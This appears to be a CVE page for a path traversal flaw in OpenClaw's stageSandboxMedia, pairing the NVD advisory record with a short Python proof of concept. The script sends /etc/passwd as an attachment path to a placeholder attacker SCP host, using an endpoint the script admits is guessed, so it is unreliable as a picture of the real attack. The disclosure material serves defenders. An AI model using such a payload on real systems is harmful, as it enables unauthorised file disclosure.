CVE-2026-32030

# This is a conceptual PoC for CVE-2026-32030 # It demonstrates how a malicious path could be crafted to exploit the stageSandboxMedia vulnerability. import requests def exploit_path_traversal(target_url, malicious_path): """ Simulates sending a request to the vulnerable stageSandboxMedia function with a crafted absolute path. """ # The endpoint might vary, assuming an API endpoint based on the description endpoint = f"{target_url}/api/stageSandboxMedia" # Payload construction: The attacker controls the 'attachment_path' parameter # Using an absolute path to read a sensitive file like /etc/passwd payload = { "message_id": "fake_msg_id", "attachment_path": malicious_path, # e.g., "/etc/passwd" "remote_host": "attacker_controlled_scp_server" } try: # Sending the malicious request response = requests.post(endpoint, json=payload) if response.status_code == 200: print(f"[+] Success! File likely staged for SCP transfer.") print(f"[+] Response: {response.text}") else: print(f"[-] Failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") # Example usage if __name__ == "__main__": target = "http://vulnerable-openclaw-instance" # Targeting a common sensitive file on Linux systems sensitive_file = "/etc/passwd" exploit_path_traversal(target, sensitive_file)

{"cve": {"id": "CVE-2026-32030", "sourceIdentifier": "[email protected]", "published": "2026-03-19T22:16:38.340", "lastModified": "2026-03-25T15:16:45.980", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.19 contain a path traversal vulnerability in the stageSandboxMedia function that accepts arbitrary absolute paths when iMessage remote attachment fetching is enabled. An attacker who can tamper with attachment path metadata can disclose files readable by the OpenClaw process on the configured remote host via SCP."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.2.19 contienen una vulnerabilidad de salto de ruta en la función stageSandboxMedia que acepta rutas absolutas arbitrarias cuando la obtención remota de archivos adjuntos de iMessage está habilitada. Un atacante que pueda manipular los metadatos de la ruta de los archivos adjuntos puede divulgar archivos legibles por el proceso de OpenClaw en el host remoto configurado a través de SCP."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.19", "matchCriteriaId": "539A1AE2-E6EC-4FC0-A794-28AA37D76D8E"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/1316e5740382926e45a42097b4bfe0aef7d63e8e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x9cf-3w63-rpq9", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-sensitive-file-disclosure-via-stagesandboxmedia-path-traversal", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}